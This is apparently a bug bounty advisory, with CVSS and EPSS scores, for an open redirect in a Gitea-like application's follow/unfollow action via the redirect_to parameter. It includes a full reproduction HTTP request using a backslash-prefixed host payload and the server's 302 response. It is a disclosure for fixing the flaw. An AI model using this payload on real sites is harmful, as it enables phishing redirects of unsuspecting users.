4.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
3.6 Low
CVSS2
Access Vector
NETWORK
Access Complexity
HIGH
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:H/Au:S/C:P/I:P/A:N
0.0004 Low
EPSS
Percentile
12.3%
The idea is similar to CVE-2022-1058 ( https://huntr.dev/bounties/4fb42144-ac70-4f76-a5e1-ef6b5e55dc0d/ ).
Browsers interpreted \\example.com
-> https://example.com
and lead to open redirect
The vulnerable API is lie in follow/unfollow action on user’s profile.
In order to quickly reproduce the bug:
Vulnerable parameter: redirect_to
POST /admin123?action=follow&redirect_to=\\example.com HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: null
Connection: close
Cookie: i_like_gitea=7c60991704df67dd; lang=en-US; _csrf=kxOfYgnfpMMIT6mWaCfzPYRHdI46MTY4NjA0MjMxNDcwMTE0ODY5OQ
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
_csrf=kxOfYgnfpMMIT6mWaCfzPYRHdI46MTY4NjA0MjMxNDcwMTE0ODY5OQ
Response from server:
HTTP/1.1 302 Found
Location: /\\example.com
Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
Date: Wed, 07 Jun 2023 07:32:30 GMT
Content-Length: 0
Connection: close
Following a successful POST request will redirect user back to example.com
. Location header will be set to /\\example.com
and will be interpreted by the browser as a redirect to //example.com
4.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
3.6 Low
CVSS2
Access Vector
NETWORK
Access Complexity
HIGH
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:H/Au:S/C:P/I:P/A:N
0.0004 Low
EPSS
Percentile
12.3%